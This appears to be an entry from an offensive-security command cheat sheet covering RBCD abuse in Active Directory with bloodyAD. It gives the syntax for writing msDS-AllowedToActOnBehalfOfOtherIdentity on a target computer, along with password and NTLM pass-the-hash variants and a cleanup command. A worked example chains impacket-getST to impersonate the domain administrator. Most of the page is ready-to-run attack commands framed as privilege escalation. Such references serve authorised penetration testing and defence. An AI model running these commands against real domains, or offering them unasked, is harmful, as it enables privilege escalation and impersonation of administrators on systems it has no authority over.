bloodyAD Set RBCD

Configure Resource-Based Constrained Delegation: write msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer to allow a controlled machine account to S4U2Self/S4U2Proxy as any user against it. Classic privesc when you have GenericWrite on a server and a machine account (e.g. via add-computer + MAQ).

Tool
bloodyAD
Category
Privilege Escalation / Delegation Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> add rbcd <target_computer> <controlled_computer$>

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

bloodyAD --host <dc-ip> -d <domain> -u <user> -p :<hash> add rbcd <target_computer> <controlled_computer$>

Cleanup requires password

bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> remove rbcd <target_computer> <controlled_computer$>

Examples

bloodyAD --host 10.10.10.10 -d corp.local -u jdoe -p 'Password123!' add rbcd 'TARGET$' 'PWNED$'
impacket-getST -spn 'cifs/target.corp.local' -impersonate administrator 'corp.local/PWNED$:ComputerPass123!'

Tags

bloodyad rbcd delegation s4u privesc

References